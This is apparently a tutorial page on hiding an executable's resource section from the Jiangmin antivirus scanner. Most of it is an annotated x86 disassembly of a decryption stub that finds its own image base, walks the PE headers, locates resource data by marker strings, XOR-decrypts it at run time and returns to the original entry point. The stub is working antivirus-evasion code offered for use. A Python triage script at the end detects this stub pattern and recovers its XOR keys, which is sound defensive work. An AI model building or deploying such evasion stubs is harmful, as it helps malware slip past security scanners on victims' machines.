Automatic Encryption of the Resource Section
Jiangmin scans the resource section quite strictly, so the resource section needs special handling.
Keywords
004C55E1 5C 52 55 4E 45 78 65 4D 65 6D 55 6E 69 74 00 54 /RUNExeMemUnit.T
004C55F1 50 46 30 0D 54 4D 61 69 6E 46 6F 72 6D 56 65 72 PF0.TMainFormVer2
004A2238 > 55 push ebp
004A2239 89E5 mov ebp, esp
004A223B 51 push ecx
004A223C B9 08000000 mov ecx, 0x8
004A2241 6A 00 push 0x0
004A2243 49 dec ecx
004A2244 ^ 75 FB jnz short 004A2241
004A2246 8B4C24 20 mov ecx, dword ptr [esp+0x20]
004A224A 8944E4 1C mov dword ptr [esp+0x1C], eax
004A224E 895CE4 18 mov dword ptr [esp+0x18], ebx
004A2252 894CE4 14 mov dword ptr [esp+0x14], ecx
004A2256 8954E4 10 mov dword ptr [esp+0x10], edx
004A225A 8964E4 0C mov dword ptr [esp+0xC], esp
004A225E 896CE4 08 mov dword ptr [esp+0x8], ebp
004A2262 8974E4 04 mov dword ptr [esp+0x4], esi
004A2266 893CE4 mov dword ptr [esp], edi
004A2269 90 nop
004A226A 90 nop
004A226B 90 nop
004A226C 90 nop
004A226D 90 nop
004A226E E8 00000000 call 004A2273
004A2273 58 pop eax
004A2274 25 00F0FFFF and eax, -0x1000
004A2279 66:8138 4D5A cmp word ptr [eax], 0x5A4D
004A227E 74 07 je short 004A2287
004A2280 2D 00100000 sub eax, 0x1000
004A2285 ^ EB F2 jmp short 004A2279
004A2287 50 push eax ; push
004A2288 8BD8 mov ebx, eax
004A228A 83C3 3C add ebx, 0x3C
004A228D 8B1B mov ebx, dword ptr [ebx]
004A228F 03D8 add ebx, eax ; pe address
004A2291 8BD3 mov edx, ebx ; ebx edx
004A2293 33C9 xor ecx, ecx
004A2295 66:8B4B 06 mov cx, word ptr [ebx+0x6] ; cx num
004A2299 33C0 xor eax, eax
004A229B 66:8B43 14 mov ax, word ptr [ebx+0x14] ; size of the optional header
004A229F 83C3 18 add ebx, 0x18
004A22A2 03D8 add ebx, eax ; first section header
004A22A4 90 nop
004A22A5 49 dec ecx ; 28
004A22A6 83C3 28 add ebx, 0x28
004A22A9 49 dec ecx
004A22AA ^ 75 FA jnz short 004A22A6
004A22AC 90 nop
004A22AD 83C3 0C add ebx, 0xC ; rva
004A22B0 8B1B mov ebx, dword ptr [ebx] ; rva
004A22B2 031C24 add ebx, dword ptr [esp] ; resource section address (image base + RVA)
004A22B5 53 push ebx ; push
004A22B6 90 nop
004A22B7 90 nop
004A22B8 90 nop
004A22B9 90 nop
004A22BA 90 nop
004A22BB 90 nop
004A22BC 90 nop ; next search
004A22BD 803B 5C cmp byte ptr [ebx], 0x5C
004A22C0 74 03 je short 004A22C5
004A22C2 43 inc ebx
004A22C3 ^ EB F8 jmp short 004A22BD
004A22C5 807B 01 52 cmp byte ptr [ebx+0x1], 0x52
004A22C9 74 03 je short 004A22CE
004A22CB 43 inc ebx
004A22CC ^ EB EF jmp short 004A22BD
004A22CE 807B 02 55 cmp byte ptr [ebx+0x2], 0x55
004A22D2 74 03 je short 004A22D7
004A22D4 43 inc ebx
004A22D5 ^ EB E6 jmp short 004A22BD
004A22D7 807B 03 4E cmp byte ptr [ebx+0x3], 0x4E
004A22DB 74 03 je short 004A22E0
004A22DD 43 inc ebx
004A22DE ^ EB DD jmp short 004A22BD
004A22E0 807B 04 45 cmp byte ptr [ebx+0x4], 0x45
004A22E4 74 03 je short 004A22E9
004A22E6 43 inc ebx
004A22E7 ^ EB D4 jmp short 004A22BD
004A22E9 90 nop ; ebx now points at the match
004A22EA 83EB 05 sub ebx, 0x5
004A22ED B9 10060000 mov ecx, 0x610
004A22F2 8033 A7 xor byte ptr [ebx], 0xA7
004A22F5 4B dec ebx
004A22F6 49 dec ecx
004A22F7 ^ 75 F9 jnz short 004A22F2 ; XOR the resource data located by the blind search
004A22F9 90 nop
004A22FA 90 nop
004A22FB 90 nop
004A22FC 90 nop
004A22FD 90 nop
004A22FE 803B 54 cmp byte ptr [ebx], 0x54
004A2301 74 03 je short 004A2306
004A2303 43 inc ebx
004A2304 ^ EB F8 jmp short 004A22FE
004A2306 807B 01 50 cmp byte ptr [ebx+0x1], 0x50
004A230A 74 03 je short 004A230F
004A230C 43 inc ebx
004A230D ^ EB EF jmp short 004A22FE
004A230F 807B 02 46 cmp byte ptr [ebx+0x2], 0x46
004A2313 74 03 je short 004A2318
004A2315 43 inc ebx
004A2316 ^ EB E6 jmp short 004A22FE
004A2318 807B 03 30 cmp byte ptr [ebx+0x3], 0x30
004A231C 74 03 je short 004A2321
004A231E 43 inc ebx
004A231F ^ EB DD jmp short 004A22FE
004A2321 807B 04 0D cmp byte ptr [ebx+0x4], 0xD
004A2325 74 03 je short 004A232A
004A2327 43 inc ebx
004A2328 ^ EB D4 jmp short 004A22FE
004A232A 807B 05 54 cmp byte ptr [ebx+0x5], 0x54
004A232E 74 03 je short 004A2333
004A2330 43 inc ebx
004A2331 ^ EB CB jmp short 004A22FE
004A2333 90 nop
004A2334 90 nop
004A2335 83C3 13 add ebx, 0x13 ; start
004A2338 B9 B0020000 mov ecx, 0x2B0
004A233D 8033 9A xor byte ptr [ebx], 0x9A
004A2340 43 inc ebx
004A2341 49 dec ecx
004A2342 ^ 75 F9 jnz short 004A233D
004A2344 90 nop
004A2345 58 pop eax
004A2346 58 pop eax
004A2347 90 nop
004A2348 8B44E4 1C mov eax, dword ptr [esp+0x1C]
004A234C 8B5CE4 18 mov ebx, dword ptr [esp+0x18]
004A2350 8B4CE4 14 mov ecx, dword ptr [esp+0x14]
004A2354 8B54E4 10 mov edx, dword ptr [esp+0x10]
004A2358 8B64E4 0C mov esp, dword ptr [esp+0xC]
004A235C 8B6CE4 08 mov ebp, dword ptr [esp+0x8]
004A2360 8B74E4 04 mov esi, dword ptr [esp+0x4]
004A2364 8B3CE4 mov edi, dword ptr [esp]
004A2367 B9 00020000 mov ecx, 0x200
004A236C C1E1 06 shl ecx, 0x6
004A236F C1E9 0C shr ecx, 0xC
004A2372 83EC FC sub esp, -0x4
004A2375 49 dec ecx
004A2376 ^ 75 FA jnz short 004A2372
004A2378 8B6C24 04 mov ebp, dword ptr [esp+0x4]
004A237C B9 00020000 mov ecx, 0x200
004A2381 C1E1 06 shl ecx, 0x6
004A2384 C1E9 0C shr ecx, 0xC
004A2387 44 inc esp
004A2388 49 dec ecx
004A2389 ^ 75 FC jnz short 004A2387
004A238B 8B4C24 F8 mov ecx, dword ptr [esp-0x8]
004A238F E8 00000000 call 004A2394
004A2394 812C24 4C050000 sub dword ptr [esp], 0x54C ; 0x54C is the distance between the new entry point and the original entry point
004A239B C3 retn
==============
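A static triage check for the kind of stub listed above, added here as an example (it is not the page's code): it looks for the self-locating MZ back-scan idiom and for the single-byte XOR loops, recovers key, byte count and direction from each loop, and can undo a recovered loop over a sample so the cleartext resource (for example the TPF0 form header) is available for analysis. The input buffer is constructed from the opcode column of the listing.

```python
import re
import struct

# Constructed sample input: opcode bytes copied from the stub listing above
# (MZ back-scan, section walk fragment, and both XOR loops).
STUB = bytes.fromhex(
    "E8 00 00 00 00 58 25 00 F0 FF FF 66 81 38 4D 5A 74 07 2D 00 10 00 00 EB F2"
    " 50 8B D8 83 C3 3C 8B 1B 03 D8 83 EB 05 B9 10 06 00 00 80 33 A7 4B 49 75 F9"
    " 90 90 83 C3 13 B9 B0 02 00 00 80 33 9A 43 49 75 F9"
)

# call $+5 / pop eax / and eax,-0x1000 / cmp word [eax],'MZ': the stub finding
# its own image base by walking backwards page by page to the DOS header.
MZ_BACKSCAN = re.compile(rb"\xE8\x00{4}\x58\x25\x00\xF0\xFF\xFF\x66\x81\x38\x4D\x5A")

# mov ecx,imm32 / xor byte [ebx],imm8 / inc|dec ebx / dec ecx / jnz -7:
# a single-byte XOR loop; the groups capture count, key and direction.
XOR_LOOP = re.compile(rb"\xB9(.{4})\x80\x33(.)([\x43\x4B])\x49\x75\xF9", re.DOTALL)


def find_xor_loops(data: bytes) -> list:
    """Return every XOR loop found, with its recovered key, length and direction."""
    hits = []
    for m in XOR_LOOP.finditer(data):
        hits.append({
            "offset": m.start(),
            "count": struct.unpack("<I", m.group(1))[0],
            "key": m.group(2)[0],
            "direction": "forward" if m.group(3) == b"\x43" else "backward",
        })
    return hits


def has_mz_backscan(data: bytes) -> bool:
    return MZ_BACKSCAN.search(data) is not None


def triage(data: bytes) -> str:
    """Flag a buffer that carries both the self-locating idiom and an XOR loop."""
    loops = find_xor_loops(data)
    if has_mz_backscan(data) and loops:
        return "suspicious: self-locating XOR decryption stub (%d loop(s))" % len(loops)
    return "no stub idiom found"


def recover_region(image: bytes, start: int, loop: dict) -> bytes:
    """Undo one loop's XOR over a copy of the image, as the stub would at run time."""
    buf = bytearray(image)
    step = 1 if loop["direction"] == "forward" else -1
    pos = start
    for _ in range(loop["count"]):
        buf[pos] ^= loop["key"]
        pos += step
    return bytes(buf)
```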